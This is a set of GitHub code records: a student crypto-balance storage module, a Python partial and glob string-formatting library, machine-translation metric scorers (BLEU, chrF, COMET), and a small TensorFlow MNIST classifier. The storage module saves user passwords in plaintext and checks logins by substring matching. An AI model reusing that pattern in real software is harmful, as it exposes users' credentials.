formatting:\n\n\n'''\nimport string\nfrom .base import _NoValue, Formatter, Field, is_field\n\n\nclass PartialFormatter(Formatter):\n '''Partial string formatting!! Finally!\n\n Examples:\n >>> f = lambda x, *a, **kw: (x, pformat(x, *a, **kw))\n\n >>> print(f('{a}/b/{c}/d/{e}', e='eee'))\n ... print(f('{a:s}/b/{c!s:s}/d/{e}', e='eee'))\n ... print(f('{}/b/{}/d/{}', 'aaa', 'ccc'))\n ... 
+{"seq_id":"70114156562","text":"from domain.Cryptobalance import *\nimport os\n\nstorage_folder = \"../storage\"\nscript_dir = os.path.dirname(os.path.abspath(__file__))\nfolder = os.path.join(script_dir, storage_folder)\n\ndef register_transaction(date, user_id, operation_type, symbol, amount, total_price):\n    formate_date = str(date.strftime('%d/%m/%Y %H:%M:%S'))\n    archivo = open(f'{folder}/user{user_id}/hystoric_file', 'a+')\n    archivo.write(f'{formate_date}|{symbol}|{user_id}|{operation_type}|{str(amount)}|{str(total_price)} \\n')\n    archivo.close()\n\ndef line_balance_register(logged_user, symbol, amount):\n    newCriptobalance = Cryptobalance(symbol, amount)\n    file = open(f'{folder}/user{logged_user}/balance.txt', 'a+')\n    file.write(f'{newCriptobalance.symbol}|{newCriptobalance.amount} \\n')\n    file.close()\n\ndef user_registration(user_id, user_password):\n    file = open(f'{folder}/users.txt', 'a+')\n    file.write(f'USER:{user_id}|PW:{user_password}\\n')\n    file.close()\n\ndef get_currencies_balance(user_id, symbol):\n    balance_file = open(f'{folder}/user{user_id}/balance.txt', 'r')\n    txt = balance_file.read()\n    balance_file.close()\n    if len(txt) == 0:\n        return {}\n    criptos_balance = {}\n    for line in txt.splitlines():\n        newCryptobalance = parse_reg(line)\n        criptos_balance[newCryptobalance.symbol] = newCryptobalance\n\n    return criptos_balance\n\ndef get_currencye_amount(user_id, symbol):\n    balance = get_currencies_balance(user_id, symbol)\n    if symbol in balance:\n        return balance[symbol].amount\n\n    return 0\n\n\ndef parse_reg(register):\n    separator = register.split(\"|\")\n    return Cryptobalance(separator[0], float(separator[1]))\n\ndef make_balance_reg(criptobalance):\n    return f'{criptobalance.symbol}|{criptobalance.amount} \\n'\n\ndef get_obj(symbol, amount):\n    newCriptobalance = Cryptobalance(symbol, amount)\n    return newCriptobalance\n\ndef get_criptobalance(user_id, symbol):\n    balance = get_currencies_balance(user_id, symbol)\n    if symbol in balance:\n        return balance[symbol]\n    else:\n        return None\n\ndef last_userid():\n    file = open(f'{folder}/users.txt', 'r')\n    txt = file.read()\n    file.close()\n    user_id = ''\n    for line in txt.splitlines():\n        user_id = line.split(\"|\")[0]\n    return user_id\n\ndef check_id_exist(user_id):\n    with open(f'{folder}/users.txt') as txt:\n        if f'USER:{user_id}' in txt.read():\n            return True\n    return False\n\ndef check_id_pass(user_id, user_password):\n    file = open(f'{folder}/users.txt', 'r')\n    txt = file.read()\n    file.close()\n    for line in txt.splitlines():\n        if f'USER:{user_id}|PW:{user_password}' in line:\n            return True\n\n    return False\n\ndef create_a_folder(user_id):\n    if not os.path.exists(f'{folder}/user{user_id}'):\n        os.makedirs(f'{folder}/user{user_id}')\n\ndef create_filebalance(user_id):\n    file = open(f'{folder}/user{user_id}/balance.txt', 'w+')\n    file.close()\n","repo_name":"franciscoo11/nextu-python","sub_path":"services/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":3082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
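The `storage.py` record above keeps one pipe-delimited `symbol|amount` line per holding, mirroring `parse_reg` and `make_balance_reg`. Below is a minimal round-trip sketch of that format using context managers, so file handles are closed even on early returns; the path, dataclass name, and helper names are illustrative, not part of the original module.

```python
# Round-trip sketch for the 'SYMBOL|amount' balance format used above.
from dataclasses import dataclass

@dataclass
class Balance:
    symbol: str
    amount: float

def load_balances(path):
    # One record per line; blank lines and stray whitespace are tolerated.
    balances = {}
    with open(path, 'r', encoding='utf-8') as fh:
        for line in fh:
            line = line.strip()
            if not line:
                continue
            symbol, amount = line.split('|', 1)
            balances[symbol] = Balance(symbol, float(amount))
    return balances

def append_balance(path, balance):
    with open(path, 'a', encoding='utf-8') as fh:
        fh.write(f'{balance.symbol}|{balance.amount}\n')

append_balance('balance.txt', Balance('BTC', 0.5))
print(load_balances('balance.txt'))
```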
+{"seq_id":"40020292720","text":"'''\n# Fancy string formatting\n'''\nimport string\nfrom .base import _NoValue, Formatter, Field, is_field\n\n\nclass PartialFormatter(Formatter):\n    '''Partial string formatting!! Finally!\n\n    Examples:\n    >>> f = lambda x, *a, **kw: (x, pformat(x, *a, **kw))\n    >>> f('{a}/b/{c}/d/{e}', e='eee')\n    ('{a}/b/{c}/d/{e}', '{a}/b/{c}/d/eee')\n    >>> f('{a:s}/b/{c!s:s}/d/{e}', e='eee')\n    ('{a:s}/b/{c!s:s}/d/{e}', '{a:s}/b/{c!s:s}/d/eee')\n    >>> f('{}/b/{}/d/{}', 'aaa', 'ccc')\n    ('{}/b/{}/d/{}', 'aaa/b/ccc/d/{}')\n    >>> f('{:s}/b/{}/d/{:s}', 'aaa', 'ccc')\n    ('{:s}/b/{}/d/{:s}', 'aaa/b/ccc/d/{:s}')\n\n    ## Partial Formatting:\n\n    ### The Problem:\n    You have multiple variables that you want to substitute in at different times.\n    ```python\n    name = '{param1}_{param2}/{id}/{loss:.2f}.csv'\n\n    def run_hypersearch(name, params):\n        for p in params:\n            name_i = name.format(**p)\n            os.makedirs(os.path.dirname(name_i))\n            run_test(name_i, build_experiments(**p), p)\n\n    IDS = [...]\n\n    def run_test(name, exps, format_args):\n        for id in IDS:\n            do_something_and_write_to_file(exps[id], name, dict(format_args, id=id))\n\n    def do_something_and_write_to_file(exp, name, format_args):\n        ...\n\n    run_hypersearch(name, [{}, ...])\n    ```\n\n    ### The Solution:\n    ```python\n    name = '{param1}_{param2}/{id}/{loss:.2f}.csv'\n\n    def run_hypersearch(name, params):\n        for p in params:\n            name_i = pf.pformat(name, **p)\n            os.makedirs(os.path.dirname(name_i))\n            run_test(name_i, build_experiments(**p))\n\n    IDS = [...]\n\n    def run_test(name, exps):\n        for id in IDS:\n            do_something_and_write_to_file(exps[id], pf.pformat(name, id=id))\n\n    run_hypersearch(name, [{}, ...])\n    ```\n    '''\n    def missing_field_value(self, obj):\n        return obj.field\n\n\nclass GlobFormatter(Formatter):\n    '''\n    ## Glob Formatting:\n\n    For any missing keys, an asterisk will be inserted indicating a wildcard for glob searching.\n\n    ### The Problem:\n    You want to define a file pattern that works both for a single file and for a glob\n    pattern over many files.\n\n    ```python\n    import glob\n\n    file_pattern = '{}/loss_{}'\n    file = file_pattern.format('abc', 1/3.)\n    assert file == 'abc/loss_0.3333333333333333'\n    ```\n\n    So then you say: \"I only really want two decimal places of accuracy\".\n    ```python\n    file_pattern = '{}/loss_{:.2f}'\n    assert file_pattern.format('abc', 1/3.) == 'abc/loss_0.33'\n    ```\n\n    Works, but now you want to get all files matching the pattern:\n    ```python\n    file_pattern.format('abc', '*')\n    # raises ValueError because '*' can't be formatted using `:.2f`\n    ```\n\n    ### The Solution:\n    Using `pformat.gformat`, any missing keys will be replaced with an asterisk.\n    ```python\n    import pformat as pf\n\n    file_pattern = '{}/loss_{:.2f}'\n    assert pf.gformat(file_pattern, 'abc', 1/3.) == 'abc/loss_0.33'\n    assert pf.gformat(file_pattern, 'abc') == 'abc/loss_*'\n    ```\n    '''\n    def missing_field_value(self, obj):\n        return '*'\n\n\nclass RegexFormatter(string.Formatter):\n    '''Regex match formatting.\n    Make sure that a string matches a regular expression before inserting.\n\n    Example\n    -------\n    >>> rformat(r'{i:/\\\\d[^\\\\d]*/}', i='3aasdfasdf')\n    '3aasdfasdf'\n    >>> rformat(r'{i:/\\\\d[^\\\\d]*/}', i='a3aasdfasdf')\n    ---------------------------------------------------------------------------\n    ValueError                                Traceback (most recent call last)\n    ...\n    ValueError: Input (a3aasdfasdf) did not match the regex pattern (/\\\\d[^\\\\d]*/)\n    '''\n    def format_field(self, obj, format_spec):\n        import re\n        if format_spec.startswith('/') and format_spec.endswith('/'):\n            obj = str(obj)  # coerce to string for re\n            if not re.match(format_spec[1:-1], obj):\n                raise ValueError(\n                    'Input ({}) did not match the regex pattern ({})'.format(\n                        obj, format_spec))\n            return obj\n        return super().format_field(obj, format_spec)\n\n\n# formatter_field_name_split = string.Formatter.__module__._string.formatter_field_name_split\n\nclass DefaultFormatter(Formatter):\n    '''\n    ## Default Value Formatting:\n\n    As a generalization of Glob Formatting, you can specify a custom default\n    value for each field within the format string.\n\n    ### The Problem:\n    You wish you could specify default values per field, but it's cumbersome\n    to handle, especially with type-specific format rules.\n    ```python\n    file_pattern = '{name}/loss_{loss:.2f}'\n    assert file_pattern.format(name='abc', loss=1/3.) == 'abc/loss_0.33'\n    file_pattern.format(name='abc')  # raises KeyError - missing `loss`\n    file_pattern.format(name='abc', loss=results.get('loss', '--'))\n    # raises ValueError - can't format '--' using `:.2f`\n    ```\n\n    ### The Solution:\n    Using `pformat.dformat`, default values can be specified which bypass the format rules.\n    ```python\n    import pformat as pf\n\n    file_pattern = '{name}/loss_{loss._[--]:.2f}'\n    assert pf.dformat(file_pattern, name='abc', loss=1/3.) == 'abc/loss_0.33'\n    assert pf.dformat(file_pattern, name='abc') == 'abc/loss_--'\n    ```\n    '''\n    DEFAULT_ATTR = '_'\n\n    def get_default_pattern_key_value(self, key):\n        rest = list(string._string.formatter_field_name_split(key)[1])\n\n        if len(rest) >= 2:\n            # check the last two attributes to see if it matches: *._[default_value]\n            [(is_attr1, val1), (is_attr2, val2)] = rest[-2:]\n            if not is_attr2 and (\n                    self.DEFAULT_ATTR or is_attr1 and val1 == self.DEFAULT_ATTR):\n                # split off the default value\n                split_id = ('.{}'.format(self.DEFAULT_ATTR)\n                            if self.DEFAULT_ATTR else '') + '['\n                key2 = key.rsplit(split_id, 1)[0]\n                return key2, val2\n        return None, None\n\n    def missing_field(self, e, key, a, kw):\n        # get key minus the default indicator + value\n        # e.g. {x._[no value]} => {x} where \"no value\" will be returned if x is missing\n        # basically: `key2, val2 = 'x', 'no value'`\n        key2, val2 = self.get_default_pattern_key_value(key)\n        if key2:\n            # get the field using the modified key\n            field, key3 = super().get_field(key2, a, kw)\n            # if it is still a missing field\n            if is_field(field) and field.missing:\n                # use the default value (and the original key)\n                field.key, field.value = key, val2\n                return field, key\n            return field, key3\n\n        # no default\n        return super().missing_field(e, key, a, kw)\n\n\ndef multiformatter(*formatters):\n    '''Combine several formatter classes into one, e.g.:\n\n    import pformat as pf\n    xformat = multiformatter(pf.DEFAULT, pf.PARTIAL)().format\n    xformat('{x._[--]:.2f}{unit}')\n    '''\n    return type('MultiFormatter', tuple(formatters), {})\n","repo_name":"beasteers/pformat","sub_path":"pformat/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":7151,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
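`PartialFormatter` and `GlobFormatter` in the record above both reduce to one decision: what a missing field renders as. Below is a self-contained sketch of that design built directly on `string.Formatter`; it is not the package's actual `Formatter` base (imported from `.base` and not shown in the record), and auto-numbered `{}` gaps re-render with explicit indices here, a simplification.

```python
# Sketch: one tolerant base class, two missing-field policies.
import string

class _Missing:
    def __init__(self, key):
        self.key = key

class TolerantFormatter(string.Formatter):
    def get_value(self, key, args, kwargs):
        # Swallow missing keys/indices and defer to missing_field_value().
        try:
            return super().get_value(key, args, kwargs)
        except (IndexError, KeyError):
            return _Missing(key)

    def convert_field(self, value, conversion):
        # Skip !s/!r conversion for missing fields so the marker survives.
        return value if isinstance(value, _Missing) else super().convert_field(value, conversion)

    def format_field(self, value, format_spec):
        if isinstance(value, _Missing):
            return self.missing_field_value(value, format_spec)
        return super().format_field(value, format_spec)

class Partial(TolerantFormatter):
    def missing_field_value(self, value, spec):
        return '{%s%s}' % (value.key, ':' + spec if spec else '')

class Glob(TolerantFormatter):
    def missing_field_value(self, value, spec):
        return '*'

assert Partial().format('{a}/b/{c:.2f}', a='aaa') == 'aaa/b/{c:.2f}'
assert Glob().format('{name}/loss_{loss:.2f}', name='abc') == 'abc/loss_*'
```

Keeping the policy in a single overridable method is the same design choice the record makes with `missing_field_value`, which is why each subclass above is only two lines.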
+{"seq_id":"19874124070","text":"#!/usr/bin/env python3\n\nimport pandas as pd\n\nfrom sacrebleu import sentence_bleu, sentence_chrf\nfrom comet import download_model, load_from_checkpoint\n\n\nclass Scorer(object):\n\n    def __call__(self, tsv_f: pd.DataFrame) -> None:\n        raise NotImplementedError\n\n\nclass BLEUScorer(Scorer):\n\n    def __call__(self, tsv_f: pd.DataFrame) -> None:\n        tsv_f['bleu-good'] = [sentence_bleu(hyp, [ref]).score for hyp, ref\n                              in zip(tsv_f['good-translation'],\n                                     tsv_f['reference'])]\n        tsv_f['bleu-bad'] = [sentence_bleu(hyp, [ref]).score for hyp, ref\n                             in zip(tsv_f['incorrect-translation'],\n                                    tsv_f['reference'])]\n\n\nclass CHRFScorer(Scorer):\n\n    def __call__(self, tsv_f: pd.DataFrame) -> None:\n        tsv_f['chrf-good'] = [sentence_chrf(hyp, [ref]).score for hyp, ref\n                              in zip(tsv_f['good-translation'],\n                                     tsv_f['reference'])]\n        tsv_f['chrf-bad'] = [sentence_chrf(hyp, [ref]).score for hyp, ref\n                             in zip(tsv_f['incorrect-translation'],\n                                    tsv_f['reference'])]\n\n\nclass COMETScorer(Scorer):\n\n    def __init__(self,\n                 model_path: str = 'wmt20-comet-da',\n                 use_reference: bool = True,\n                 gpus: int = 1,\n                 batch_size: int = 16) -> None:\n        self.prefix = 'comet'\n        if not use_reference:\n            assert 'qe' in model_path\n            self.prefix = 'cometQE'\n        model_path = download_model(model_path)\n        self.model = load_from_checkpoint(model_path)\n        self.gpus = gpus\n        self.batch_size = batch_size\n\n    def __call__(self, tsv_f: pd.DataFrame) -> None:\n        data = {'src': tsv_f['source'],\n                'mt': tsv_f['good-translation'],\n                'ref': tsv_f['reference']}\n        data = [dict(zip(data, t)) for t in zip(*data.values())]\n        tsv_f[self.prefix + '-good'], _ = self.model.predict(data,\n                                                             gpus=self.gpus,\n                                                             batch_size=self.batch_size)\n\n        data = {'src': tsv_f['source'],\n                'mt': tsv_f['incorrect-translation'],\n                'ref': tsv_f['reference']}\n        data = [dict(zip(data, t)) for t in zip(*data.values())]\n        tsv_f[self.prefix + '-bad'], _ = self.model.predict(data,\n                                                            gpus=self.gpus,\n                                                            batch_size=self.batch_size)\n","repo_name":"nikitacs16/mt-marathon-22-comet","sub_path":"breakit/scorers.py","file_name":"scorers.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
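The scorers in the record above attach segment-level scores to a good and an incorrect translation of the same source, so the two can be compared row by row. Below is a minimal usage sketch with toy data; the column names follow the record, while the toy sentences and the delta column are additions for illustration.

```python
# Contrastive scoring sketch: does the metric prefer the good translation?
import pandas as pd
from sacrebleu import sentence_bleu

df = pd.DataFrame({
    'good-translation': ['the cat sat on the mat'],
    'incorrect-translation': ['the cat sat on a hat'],
    'reference': ['the cat sat on the mat'],
})

for out_col, hyp_col in [('bleu-good', 'good-translation'),
                         ('bleu-bad', 'incorrect-translation')]:
    df[out_col] = [sentence_bleu(hyp, [ref]).score
                   for hyp, ref in zip(df[hyp_col], df['reference'])]

# A positive delta means the metric ranks the good translation higher.
df['bleu-delta'] = df['bleu-good'] - df['bleu-bad']
print(df[['bleu-good', 'bleu-bad', 'bleu-delta']])
```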
x_test.astype(\"float32\") / 255\n\n# Define the model architecture\nwith tf.device('/GPU:0'):\n model = keras.Sequential([\n keras.Input(shape=(28, 28)),\n layers.Flatten(),\n layers.Dense(128, activation=\"relu\"),\n layers.Dense(10),\n ])\n\n # Compile the model\n model.compile(\n optimizer=\"adam\",\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=[\"accuracy\"]\n )\n\n # Train the model\n model.fit(x_train, y_train, epochs=10, validation_data=(x_test, y_test))\n\n# Evaluate the model on the test data\ntest_loss, test_acc = model.evaluate(x_test, y_test, verbose=2)\nprint(f\"Test accuracy: {test_acc}\")","repo_name":"Werby213/pythonl","sub_path":"CV2PPG/CRR/my_projects/!NEURAL/CPM.py","file_name":"CPM.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}